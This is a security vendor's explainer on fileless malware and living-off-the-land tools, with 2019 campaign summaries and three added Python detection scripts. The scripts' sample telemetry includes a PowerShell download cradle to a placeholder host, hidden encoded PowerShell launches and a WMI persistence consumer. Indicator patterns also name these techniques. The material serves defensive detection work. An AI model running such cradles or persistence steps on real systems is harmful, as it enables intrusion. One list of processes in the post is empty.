Cybereason Blog | Cybersecurity News and Analysis

Fileless Malware 101: Understanding Non-Malware Attacks

Written by Cybereason Team | Sep 17, 2019 10:00:00 AM

What is Fileless Malware?

Unlike file-based attacks, fileless malware does not rely on traditional executable files. Fileless attacks abuse tools built into the operating system to carry out their work. Essentially, Windows is turned against itself.

Without an executable, there is no signature for antivirus software to detect. This is part of what makes fileless attacks so dangerous - they are able to easily evade antivirus products.

Defend against these attacks by leveraging the MITRE ATT&CK framework. Read how to create a closed-loop security process in five steps with ATT&CK.

Fileless attacks use a technique called living-off-the-land. Living-off-the-land is when attackers use legitimate tools for malicious purposes, and it has been around for at least twenty-five years. The abused, legitimate tools are known as LOLBins and include Microsoft Office macros, PowerShell, WMI, and many other system tools.

How does fileless malware work?

Fileless malware leverages trusted, legitimate processes (LOLBins) running on the operating system to perform malicious activities like lateral movement, privilege escalation, evasion, reconnaissance, and the delivery of payloads.

In our research, we have come across and prevented or detected many cases of fileless attacks just in 2019 alone. We have seen attackers use a range of default Windows processes in their attacks, including:

This is by no means an exhaustive list of processes used for fileless attacks. However, these are the LOLBins we want to highlight, because we can prevent fileless attacks that abuse them effectively and better than anyone else out there.

REASONS TO USE FILELESS MALWARE IN AN ATTACK

  • Stealthy: Fileless malware uses legitimate tools, which means it is almost impossible to blocklist the tools used in a fileless attack.
  • Living-off-the-land: The legitimate tools used for fileless malware are installed by default. The attacker does not need to create or install any custom tools to use them.
  • Trusted and Frequented: These tools are frequently used and trusted. It is not unusual to see the tools used in fileless malware running in an enterprise environment for a legitimate purpose.

LOLBINS LEVERAGED BY FILELESS MALWARE

There are more than 100 Windows system tools that can be leveraged and abused as LOLBins.  

PowerShell

PowerShell is a cross-platform, open source task automation and configuration management framework created by Microsoft. 

The PowerShell framework, based on .NET, is made up of a command-line shell and scripting language. PowerShell gives full access to many Windows system functions, including WMI and component object model (COM) objects, as well as management features for the Microsoft Exchange server and others. Further, it is able to execute payloads directly from memory, which is what enables attackers to leverage it for fileless malware. 

What is PowerShell legitimately used for?

PowerShell is meant to be a tool for automation, and it is a saving grace for administrators who need to automate tedious, repetitive tasks. You can use PowerShell to display all installed USB devices on every computer on the network, to start a task running in the background, to kill processes, or to export information about a machine. This is what makes PowerShell so critical for IT administrators: they can automate away many of their routine tasks and focus on other work. It also makes PowerShell nearly impossible to blocklist, as IT administrators need it on a daily basis.

Why use PowerShell for fileless attacks?

PowerShell gives attackers quick access to system functions of the operating system and is accepted as a legitimate, trusted tool. 

There are many reasons attackers use PowerShell for fileless attacks, including:

  • Installed By Default: PowerShell is installed by default on Windows.
  • Trusted and Frequented: Sysadmins frequently use and trust PowerShell. It is not unusual to see a PowerShell process running in an enterprise environment.
  • Easy to Obfuscate: PowerShell scripts are easy to obfuscate and can be difficult to detect with legacy security tools.
  • Gives Remote Access: PowerShell has remote access capabilities available by default, so attackers can use it remotely. 

Consider how much easier it is for an attacker to use an existing tool like PowerShell that has functionality built into it to not only communicate externally with the attacker, but also make a wide array of changes directly to the operating system. This is the potential of using PowerShell for attacks.
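The obfuscation and download behaviour described above is what defenders key on when they triage PowerShell telemetry. The following Python sketch is an added example for this post, not code from the original article or from Cybereason's products: it takes command lines from process-creation logs (Security Event ID 4688 or Sysmon Event ID 1) and script text from PowerShell Script Block Logging (Event ID 4104), decodes any -EncodedCommand argument, and scores the combined text against weighted indicators. The sample records, host names, indicator weights and threshold are all constructed assumptions for the example.

```python
import base64
import binascii
import re

# Weighted indicators used to triage PowerShell command lines and script blocks.
# Weights and threshold are assumptions for this example; tune them to your baseline.
INDICATORS = [
    ("invoke_expression", r"\b(?:iex|invoke-expression)\b", 3),
    ("download_cradle", r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b", 3),
    ("reflective_load", r"reflection\.assembly|\[assembly\]::load", 3),
    ("base64_decode", r"frombase64string", 2),
    ("hidden_window", r"-w(?:indowstyle)?\s+hidden", 2),
    ("execution_policy_bypass", r"-ex(?:ecutionpolicy)?\s+bypass", 2),
    ("backtick_obfuscation", r"\w`\w", 2),
    ("no_profile", r"-nop(?:rofile)?\b", 1),
]
ENCODED_COMMAND_WEIGHT = 2
SUSPICIOUS_THRESHOLD = 5

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; these are the common spellings.
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Constructed sample records (not real telemetry). "source" names the log the text came from:
# 4688 = Security process creation, 4104 = PowerShell Script Block Logging.
DECODED_SAMPLE = "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/stage2')"
ENCODED_SAMPLE = base64.b64encode(DECODED_SAMPLE.encode("utf-16le")).decode("ascii")
SAMPLE_EVENTS = [
    {"host": "WS01", "source": "4104", "text": "Get-ChildItem C:\\Users | Measure-Object"},
    {"host": "WS02", "source": "4104",
     "text": "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/a')"},
    {"host": "WS03", "source": "4688", "text": "powershell.exe -nop -w hidden -enc " + ENCODED_SAMPLE},
]


def decode_encoded_command(text):
    """Return the plaintext of an -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENCODED_RE.search(text)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-16le", errors="replace")


def analyze(text):
    """Score one command line or script block; the decoded payload is scanned too."""
    decoded = decode_encoded_command(text)
    haystack = text if decoded is None else text + "\n" + decoded
    indicators, score = [], 0
    if decoded is not None:
        indicators.append("encoded_command")
        score += ENCODED_COMMAND_WEIGHT
    for name, pattern, weight in INDICATORS:
        if re.search(pattern, haystack, re.IGNORECASE):
            indicators.append(name)
            score += weight
    return {"score": score, "indicators": indicators, "decoded": decoded,
            "suspicious": score >= SUSPICIOUS_THRESHOLD}


def triage(events):
    """Return the events that cross the threshold, with their analysis attached."""
    flagged = []
    for ev in events:
        result = analyze(ev["text"])
        if result["suspicious"]:
            flagged.append({**ev, **result})
    return flagged
```

Two points worth taking from this. Script Block Logging records the de-obfuscated script as PowerShell actually compiles it, so running the same scoring over 4104 events catches what a base64-encoded or tick-obfuscated command line hides from a 4688-only view. And the download-cradle and Invoke-Expression indicators are noisy on their own in shops where administrators use web-based installers, which is why the example accumulates a score rather than alerting on any single token.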

Which attacks used PowerShell?

  • Operation Cobalt Kitty: In 2017, the Cybereason Nocturnus team uncovered a massive campaign against corporations based in Asia. These attackers used a fileless PowerShell-based infrastructure with custom PowerShell payloads as part of the operation, which ultimately stole proprietary business information. 
  • The Ramnit Banking Trojan: In 2019, the Cybereason Nocturnus team uncovered a severe threat to a customer while onboarding them to our Active Threat Hunting Service. This attack executes a PowerShell command from remote servers as part of the operation that ultimately exfiltrates sensitive data including banking credentials.
  • The New Ursnif Variant Targeting Japan: In 2019, the Cybereason Nocturnus team uncovered a new variant of the prolific Ursnif trojan with enhanced features. This variant uses a fileless technique with PowerShell to check language settings on the target machine. The PowerShell command is executed by a malicious macro that makes use of the .NET Framework. This attack steals data from mail clients and email credentials stored in browsers, specifically targeting banking customers. 
  • Triple Threat: Emotet Deploys TrickBot to Steal Data and Spread Ryuk: In 2019, the Cybereason Nocturnus team uncovered a threat affecting multiple customers that made use of three different major malware: Emotet, TrickBot, and Ryuk. This variant uses a malicious macro to execute PowerShell commands that download the Emotet payload. This attack not only exfiltrates a range of sensitive data, but also drops the Ryuk ransomware to cause further damage.
  • The Fallout Exploit Kit Stays Active: In 2019, the Cybereason Nocturnus team identified an attack that used everyday Internet browsing to install malware. This attack uses PowerShell to execute the final AZORult information stealer payload. By using PowerShell, it bypasses the Antimalware Scan Interface protection mechanism in Windows. The InfoStealer exfiltrates personal data like bitcoin, sensitive files, login data, and more.
  • Sodinokibi: The Crown Prince of Ransomware: In 2019, the Cybereason Nocturnus team analyzed a new type of ransomware, Sodinokibi. This attack uses PowerShell and .NET to load and execute the malware. This attack is used to deploy ransomware, which can cause severe damage to organizations and individuals. 

Windows Management Instrumentation (WMI)

Windows Management Instrumentation (WMI) is a Microsoft standard for accessing management information about devices in an enterprise environment. WMI has been ingrained in the Windows operating system since Windows NT 4.0 and Windows 95.

What is WMI legitimately used for?

WMI is all about managing Windows devices on a network. It can report the status of local or remote machines, and it can be used to configure settings such as system properties and user groups, to schedule processes, or to disable error logging. WMI is valuable to administrators who need to manage all the machines on the network easily - a task that happens regularly in an enterprise. This management is critical to the success of an IT department, which makes WMI impossible to remove from its day-to-day operations.

Why use WMI for fileless attacks?

The earliest mainstream use of WMI for malicious purposes was in Stuxnet. Since then, attackers have regularly adopted it for reconnaissance, detecting antivirus products, code execution, virtual machine detection, lateral movement, persistence, and data theft. 

There are many reasons attackers use WMI for fileless attacks, including:

  • Installed By Default: WMI is installed by default on Windows.
  • Trusted and Frequented: Sysadmins frequently use and trust WMI. It is not unusual to see WMI used in an enterprise environment.
  • Runs as System: Any permanent WMI event subscription runs as SYSTEM, so the attacker's code runs with the highest local privileges under a trusted identity.
  • Easily Triggered: Almost every operating system action can trigger a WMI event, making it incredibly easy to use in conjunction with operating system actions. 

For an in-depth explanation of using WMI for fileless attacks, read Abusing WMI to Build a Persistent, Asynchronous, and Fileless Backdoor.
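A permanent WMI event subscription is three objects, not one: a filter (the WQL query that says when to fire), a consumer (what to do), and a binding that ties them together. None of the three looks alarming in isolation, which is why hunting for them means joining the pieces back up. The Python below is an added example for this post, not code from the original article or from Cybereason: it reconstructs subscriptions from records shaped like Sysmon's WmiEvent events (Event ID 19 for a filter, 20 for a consumer, 21 for the binding) and flags the ones whose consumer executes code. The records are constructed; the field names follow Sysmon, the command line is a placeholder, and the "SCM Event Log" pair mirrors the subscription Windows ships by default so that the baseline allowlist has something to match.

```python
import re

# Constructed records, simplified from Sysmon's WmiEvent events: ID 19 = filter created,
# ID 20 = consumer created, ID 21 = consumer bound to filter. Field names follow Sysmon;
# all values are made up for this example. The "SCM Event Log" pair mirrors the
# subscription Windows ships by default, and the command line is a placeholder.
SAMPLE_EVENTS = [
    {"EventID": 19, "Operation": "Created", "User": "NT AUTHORITY\\SYSTEM",
     "Name": "SCM Event Log Filter", "EventNamespace": "root\\cimv2",
     "Query": "select * from MSFT_SCMEventLogEvent"},
    {"EventID": 20, "Operation": "Created", "User": "NT AUTHORITY\\SYSTEM",
     "Name": "SCM Event Log Consumer", "Type": "NTEventLogEventConsumer", "Destination": ""},
    {"EventID": 21, "Operation": "Created", "User": "NT AUTHORITY\\SYSTEM",
     "Consumer": 'NTEventLogEventConsumer.Name="SCM Event Log Consumer"',
     "Filter": '__EventFilter.Name="SCM Event Log Filter"'},
    {"EventID": 19, "Operation": "Created", "User": "CORP\\jdoe",
     "Name": "Updater", "EventNamespace": "root\\cimv2",
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 "
              "WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"},
    {"EventID": 20, "Operation": "Created", "User": "CORP\\jdoe",
     "Name": "Updater", "Type": "CommandLineEventConsumer",
     "Destination": "powershell.exe -nop -w hidden -enc <BASE64_PLACEHOLDER>"},
    {"EventID": 21, "Operation": "Created", "User": "CORP\\jdoe",
     "Consumer": 'CommandLineEventConsumer.Name="Updater"',
     "Filter": '__EventFilter.Name="Updater"'},
]

# Consumer classes that run attacker-supplied code when their filter fires.
CODE_EXEC_CONSUMERS = {"CommandLineEventConsumer", "ActiveScriptEventConsumer"}
# Known-good (filter, consumer) pairs; a stock install has this one. Extend from your own baseline.
BASELINE = {("SCM Event Log Filter", "SCM Event Log Consumer")}
OBJECT_PATH_RE = re.compile(r'^(?P<cls>[A-Za-z_]+)\.Name="(?P<name>[^"]+)"$')


def parse_object_path(ref):
    """Split 'CommandLineEventConsumer.Name="Updater"' into ('CommandLineEventConsumer', 'Updater')."""
    m = OBJECT_PATH_RE.match(ref)
    if not m:
        raise ValueError(f"unrecognised WMI object path: {ref!r}")
    return m.group("cls"), m.group("name")


def reconstruct(events):
    """Join filter, consumer and binding records into complete subscriptions."""
    filters = {e["Name"]: e for e in events if e["EventID"] == 19}
    consumers = {e["Name"]: e for e in events if e["EventID"] == 20}
    subscriptions = []
    for e in events:
        if e["EventID"] != 21:
            continue
        _, filter_name = parse_object_path(e["Filter"])
        consumer_cls, consumer_name = parse_object_path(e["Consumer"])
        flt = filters.get(filter_name, {})
        con = consumers.get(consumer_name, {})
        subscriptions.append({
            "filter": filter_name,
            "consumer": consumer_name,
            "consumer_type": con.get("Type", consumer_cls),
            "query": flt.get("Query", ""),
            "destination": con.get("Destination", ""),
            "user": e["User"],
        })
    return subscriptions


def assess(subscriptions):
    """Return the subscriptions that deserve an analyst's attention, each with its reasons."""
    flagged = []
    for s in subscriptions:
        if (s["filter"], s["consumer"]) in BASELINE:
            continue
        reasons = []
        if s["consumer_type"] in CODE_EXEC_CONSUMERS:
            reasons.append(f"{s['consumer_type']} executes code when the filter fires")
        if re.search(r"powershell|cmd\.exe|wscript|cscript|mshta|regsvr32|rundll32", s["destination"], re.I):
            reasons.append("destination launches a script host or other LOLBin")
        if re.search(r"__Instance\w*Event\s+WITHIN", s["query"], re.I):
            reasons.append("polling intrinsic-event query, a timer-style trigger")
        if not s["user"].upper().startswith("NT AUTHORITY\\"):
            reasons.append(f"created by a user account ({s['user']}) rather than a service identity")
        if reasons:
            flagged.append({**s, "reasons": reasons})
    return flagged
```

On a live host the same three object types can be enumerated from the root\subscription namespace (__EventFilter, __EventConsumer, __FilterToConsumerBinding) and diffed against a known-good baseline; the telemetry route shown here has the advantage of also recording who created each object and when, which the objects themselves do not preserve.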

Which attacks used WMI?

  • GandCrab’s Evasive Infection Chain: In 2019, the Cybereason Nocturnus team detected and prevented a campaign against an international, Japan-based company. This attack used a malicious macro as a trigger to decrypt the payload and a WMI object to set environment variables. This attack ultimately ransoms the target machine. The GandCrab ransomware is responsible for 40% of ransomware infections globally.
  • Adobe Worm Faker Delivers Customized Payloads: In 2019, the Cybereason Nocturnus team found an active malware that dynamically changed its behavior depending on the target machine. The attack used WMI methods to gather information about the target machine and to gather information about existing AV products on the target machine. The main goal of this attack is to exfiltrate customer information like financial data and passwords. 
  • Operation Soft Cell: In 2019, the Cybereason Nocturnus team uncovered a massive operation targeting telecommunications providers across the globe. The attack used WMI commands to move laterally across the network. This attack exfiltrated data like call detail records from telecommunications providers for years before being found. 
  • Exploit Kits Shade Into New Territory: In 2019, the Cybereason Nocturnus team observed the Spelevo exploit kit in the wild. This attack used WMI to successfully execute its payload. This attack was used for click fraud, a deviation from its ransomware roots. 

.NET Framework

.NET is an open source framework made by Microsoft: a set of generic, commonly used and extensible functionality that developers build on. It has two main components that developers use together to create applications: the Common Language Runtime and the .NET Framework Class Library. Programs written for the .NET Framework execute in the Common Language Runtime software environment. .NET was first released in beta in late 2000. Since then, it has gained popularity not only as a framework, but as an open source developer platform for building web, mobile, and desktop applications, as well as more specific application models.

What is .NET legitimately used for?

.NET is a framework built by Microsoft to develop a wide range of applications. It gives access to an infrastructure of functions that developers use frequently and can build on. It is used with several programming languages, including C#, VB.NET, C++, and F#. It can be used to create Windows-based applications, cloud applications, artificial intelligence applications, or even cross-platform applications. 

For example, you can use .NET to ping another IP address on the network, or create a new process. .NET can be used to allocate memory, create a new thread, or write shellcode.  These are just a few examples of the tens of thousands of ways you can use .NET in an application. 

Why use .NET for fileless attacks?

.NET is an impressive framework: .NET applications can run on multiple platforms and architectures. It saves developers time and gives them easy access to core machine functionality. To put things into perspective, PowerShell is built on top of the .NET Framework. Without .NET, there is no PowerShell. But attackers also use .NET in fileless attacks independently of PowerShell. 

There are many reasons attackers use .NET for fileless attacks, including:

  • Installed By Default: .NET is installed by default on Windows.
  • Trusted and Frequented: .NET has a community of developers around it that use it for any number of trusted and frequently used applications. It is not an easy framework to remove from daily operations. 
  • Saves Time: .NET makes a lot of common tasks one might wish to perform easier, since the framework has tens of thousands of functions attackers can use to interact with the system. 
  • Easy to Implement: .NET is easy to use. There is a significant amount of documentation available to enable developers to build legitimate apps - information attackers can leverage for their own purposes. 

Which attacks used .NET?

  • The New Ursnif Variant Targeting Japan: In 2019, the Cybereason Nocturnus team uncovered a new variant of the prolific Ursnif trojan with enhanced features. This variant uses a fileless technique with PowerShell to check language settings on the target machine. The PowerShell command is executed by a malicious macro that makes use of the .NET Framework. This attack steals data from mail clients and email credentials stored in browsers, specifically targeting banking customers. 
  • Sodinokibi: The Crown Prince of Ransomware: In 2019, the Cybereason Nocturnus team analyzed a new type of ransomware, Sodinokibi. This attack uses PowerShell and .NET to load and execute the malware. This attack is used to deploy ransomware, which can cause severe damage to organizations and individuals. 

WHAT ARE MACROS?

In Microsoft Office, macros are used to automate frequent tasks. They are typically created in Word documents or Excel spreadsheets as a series of commands grouped together to complete a task automatically. Many macros are written in Visual Basic for Applications and can be created by anyone, not just software developers. 

What are macros legitimately used for?

Macros can be very beneficial, especially in Microsoft Excel documents. Any task that needs to be done repeatedly can be automated with a macro. For example, every month, accountants need to produce a report on all overdue customer accounts. A macro can automate this task so that the overdue accounts are listed and marked automatically. This saves the accountant time and effort on work that should be automated. Scenarios like this are common in enterprise environments. 

Why use macros for fileless attacks?

Using macros for fileless attacks is convenient, because they can easily be combined with phishing campaigns and social engineering techniques to trick a user. In an enterprise, receiving a Microsoft Word or Excel document is a common occurrence. Most individuals would not think twice about opening a Microsoft Word document from someone at their company or from a prospective customer. 

Malicious macros are also able to execute a variety of tasks, including running instances of PowerShell. From there, the attackers can use PowerShell to execute a variety of tasks including downloading a malicious payload.

There are many reasons attackers use macros for fileless attacks, including:

  • Installed By Default: Macro support ships with Microsoft Office by default, although macros themselves are not enabled by default.
  • Trusted and Frequented: Enterprises frequently use and trust Microsoft Office. It is not unusual to receive a Microsoft Word or Excel document in an enterprise setting.
  • Easy to Implement: There is a plethora of available documentation on how to write macros, and Microsoft intentionally makes them easy to implement so anyone - regardless of technical background - can use them.
  • Operating System Agnostic: Macros are implemented with a particular application in mind, usually Microsoft Word or Excel, which means they can be largely operating system agnostic, and infect a computer running any operating system.
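Because the document, the macro and PowerShell are all legitimate on their own, the macro-to-PowerShell chain described above is caught most reliably by process lineage rather than by anything on disk. The Python below is an added example for this post, not code from the original article or from Cybereason: it runs a small parent/child rule set over constructed records shaped like Sysmon Event ID 1 (process creation), reports an Office application spawning a script host, and renders the full ancestry so an analyst sees the chain at a glance. It goes a step beyond the macro case in the text by also covering WmiPrvSE.exe spawning a script host, the pattern that WMI-based lateral movement and WMI event consumers produce. GUIDs, paths, users and command lines are made up, and the <...> arguments are placeholders.

```python
# Constructed records, simplified from Sysmon Event ID 1 (process creation). Field names
# follow Sysmon; the GUIDs, paths, users and command lines are made up for this example,
# and <...> arguments are placeholders, not real payloads.
OFFICE = "C:\\Program Files\\Microsoft Office\\root\\Office16\\"
SYS32 = "C:\\Windows\\System32\\"
PS = SYS32 + "WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    {"ProcessGuid": "{G-1}", "ParentProcessGuid": "{G-0}", "User": "CORP\\jdoe",
     "Image": "C:\\Windows\\explorer.exe", "ParentImage": SYS32 + "userinit.exe",
     "CommandLine": "explorer.exe"},
    {"ProcessGuid": "{G-2}", "ParentProcessGuid": "{G-1}", "User": "CORP\\jdoe",
     "Image": OFFICE + "WINWORD.EXE", "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": '"WINWORD.EXE" /n "C:\\Users\\jdoe\\Downloads\\invoice.docm"'},
    {"ProcessGuid": "{G-3}", "ParentProcessGuid": "{G-2}", "User": "CORP\\jdoe",
     "Image": PS, "ParentImage": OFFICE + "WINWORD.EXE",
     "CommandLine": "powershell.exe -nop -w hidden -enc <BASE64_PLACEHOLDER>"},
    # An administrator opening a console from the desktop: same binary, benign lineage.
    {"ProcessGuid": "{G-4}", "ParentProcessGuid": "{G-1}", "User": "CORP\\jdoe",
     "Image": PS, "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe"},
    {"ProcessGuid": "{G-5}", "ParentProcessGuid": "{G-9}", "User": "NT AUTHORITY\\NETWORK SERVICE",
     "Image": SYS32 + "wbem\\WmiPrvSE.exe", "ParentImage": SYS32 + "svchost.exe",
     "CommandLine": "wmiprvse.exe -secured -Embedding"},
    {"ProcessGuid": "{G-6}", "ParentProcessGuid": "{G-5}", "User": "CORP\\svc_admin",
     "Image": SYS32 + "cmd.exe", "ParentImage": SYS32 + "wbem\\WmiPrvSE.exe",
     "CommandLine": "cmd.exe /c <COMMAND_PLACEHOLDER>"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe", "bitsadmin.exe"}
WMI_PROVIDER_HOST = "wmiprvse.exe"


def basename(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def lineage(event, by_guid, max_depth=8):
    """Follow ParentProcessGuid links and render the chain as 'root > ... > child'."""
    chain = [basename(event["Image"])]
    current = event
    for _ in range(max_depth):
        parent = by_guid.get(current["ParentProcessGuid"])
        if parent is None:
            # Parent started before our log window; fall back to the name the child recorded.
            chain.append(basename(current["ParentImage"]))
            break
        chain.append(basename(parent["Image"]))
        current = parent
    return " > ".join(reversed(chain))


def detect(events):
    """Apply parent/child rules and return one finding per matching process creation."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    findings = []
    for e in events:
        child, parent = basename(e["Image"]), basename(e["ParentImage"])
        if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
            rule = "office_app_spawned_script_host"
        elif parent == WMI_PROVIDER_HOST and child in SCRIPT_HOSTS:
            rule = "wmi_provider_host_spawned_script_host"
        else:
            continue
        findings.append({"rule": rule, "user": e["User"], "lineage": lineage(e, by_guid),
                         "command_line": e["CommandLine"]})
    return findings
```

The benign record in the sample (the same powershell.exe launched from explorer.exe) is deliberately included: the rule never looks at the PowerShell binary itself, only at who started it, which is the distinction that keeps a lineage rule quiet in an environment where administrators use PowerShell all day.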

Which attacks used macros?

  • The New Ursnif Variant Targeting Japan: In 2019, the Cybereason Nocturnus team uncovered a new variant of the prolific Ursnif trojan with enhanced features. This variant uses a fileless technique with PowerShell to check language settings on the target machine. The PowerShell command is executed by a malicious macro that makes use of the .NET Framework. This attack steals data from mail clients and email credentials stored in browsers, specifically targeting banking customers. 
  • Triple Threat: Emotet Deploys TrickBot to Steal Data and Spread Ryuk: In 2019, the Cybereason Nocturnus team uncovered a threat affecting multiple customers that made use of three different major malware: Emotet, TrickBot, and Ryuk. This variant uses a malicious macro to execute PowerShell commands that download the Emotet payload. This attack not only exfiltrates a range of sensitive data, but also drops the Ryuk ransomware to cause further damage. 
  • TA505 Targets Financial Enterprises: In 2019, the Cybereason Nocturnus team uncovered a meticulously planned operation against a financial institution. This variant used a malicious macro to execute a Windows process to connect to a remote command and control server. This attack planted a backdoor on the system used to quietly exfiltrate as much data as possible.
  • GandCrab’s Evasive Infection Chain: In 2019, the Cybereason Nocturnus team detected and prevented a campaign against an international, Japan-based company. This attack used a malicious macro to decrypt the payload and a WMI object to set environment variables. This attack ultimately ransoms the target machine. The GandCrab ransomware is responsible for 40% of ransomware infections globally.

WHY IS DETECTION AND PREVENTION OF FILELESS MALWARE CHALLENGING?

Fileless malware depends on tools that are part of the daily workflow of enterprise professionals. Attackers know they can rely on a set of tools that are pre-installed on every Windows machine and are vital for the daily operations of the enterprise. Fileless malware also leaves few or no files on disk, which means signature-based prevention and detection methods will not be able to identify it. This makes it incredibly difficult for an analyst or security product to tell whether a tool is being used for malicious purposes or for normal, day-to-day actions. Analysts must have an intimate understanding of their environment to be able to identify LOLBins at work.

This is one reason why fileless malware attacks have become so prevalent. We only expect them to become more common as attackers continue to iterate and share their techniques with the community, and as they potentially develop this malware for profit under a malware-as-a-service model.

How did we get such deep visibility into these attacks? Our Nocturnus team leveraged our world-class EDR. To learn how we do it, read our white paper on the Right Roles for SIEM and EDR.

OBSERVED FILELESS ATTACKS OF 2019

Attack                                                                | Type of Fileless Attack
----------------------------------------------------------------------+------------------------
Operation Cobalt Kitty                                                | PowerShell
The Ramnit Banking Trojan                                             | PowerShell
The New Ursnif Variant Targeting Japan                                | PowerShell, Macro, .NET
Triple Threat: Emotet Deploys TrickBot to Steal Data and Spread Ryuk  | PowerShell
The Fallout Exploit Kit Stays Active                                  | PowerShell
GandCrab’s Evasive Infection Chain                                    | WMI
Adobe Worm Faker Delivers Customized Payloads                         | WMI
Operation Soft Cell                                                   | WMI
Exploit Kits Shade Into New Territory                                 | WMI

  • Operation Cobalt Kitty: In 2017, the Cybereason Nocturnus team uncovered a massive campaign against corporations based in Asia. These attackers used a fileless PowerShell-based infrastructure with custom PowerShell payloads as part of the operation, which ultimately stole proprietary business information. 
  • The Ramnit Banking Trojan: In 2019, the Cybereason Nocturnus team uncovered a severe threat to a customer while onboarding them to our Active Threat Hunting Service. This attack executes a PowerShell command from remote servers as part of the operation that ultimately exfiltrates sensitive data including banking credentials.
  • The New Ursnif Variant Targeting Japan: In 2019, the Cybereason Nocturnus team uncovered a new variant of the prolific Ursnif trojan with enhanced features. This variant uses a fileless technique with PowerShell to check language settings on the target machine. The PowerShell command is executed by a malicious macro that makes use of the .NET Framework. This attack steals data from mail clients and email credentials stored in browsers, specifically targeting banking customers. 
  • Triple Threat: Emotet Deploys TrickBot to Steal Data and Spread Ryuk: In 2019, the Cybereason Nocturnus team uncovered a threat affecting multiple customers that made use of three different major malware: Emotet, TrickBot, and Ryuk. This variant uses a malicious macro to execute PowerShell commands that download the Emotet payload. This attack not only exfiltrates a range of sensitive data, but also drops the Ryuk ransomware to cause further damage. 
  • The Fallout Exploit Kit Stays Active: In 2019, the Cybereason Nocturnus team identified an attack that used everyday Internet browsing to install malware. This attack uses PowerShell to execute the final AZORult information stealer payload. By using PowerShell, it bypasses the Antimalware Scan Interface protection mechanism in Windows. The InfoStealer exfiltrates personal data like bitcoin, sensitive files, login data, and more. 
  • GandCrab’s Evasive Infection Chain: In 2019, the Cybereason Nocturnus team detected and prevented a campaign against an international, Japan-based company. This attack used a malicious macro as a trigger to decrypt the payload and a WMI object to set environment variables. This attack ultimately ransoms the target machine. The GandCrab ransomware is responsible for 40% of ransomware infections globally.
  • Adobe Worm Faker Delivers Customized Payloads: In 2019, the Cybereason Nocturnus team found an active malware that dynamically changed its behavior depending on the target machine. The attack used WMI methods to gather information about the target machine and to gather information about existing AV products on the target machine. The main goal of this attack is to exfiltrate customer information like financial data and passwords. 
  • Operation Soft Cell: In 2019, the Cybereason Nocturnus team uncovered a massive operation targeting telecommunications providers across the globe. The attack used WMI commands to move laterally across the network. This attack exfiltrated data like call detail records from telecommunications providers for years before being found.
  • Exploit Kits Shade Into New Territory: In 2019, the Cybereason Nocturnus team observed the Spelevo exploit kit in the wild. This attack used WMI to successfully execute its payload. This attack was used for click fraud, a deviation from its ransomware roots.
  • Sodinokibi: The Crown Prince of Ransomware: In 2019, the Cybereason Nocturnus team analyzed a new type of ransomware, Sodinokibi. This attack uses PowerShell and .NET to load and execute the malware. This attack is used to deploy ransomware, which can cause severe damage to organizations and individuals. 

For an even deeper dive on fileless malware using examples from our very own Nocturnus research team, click here.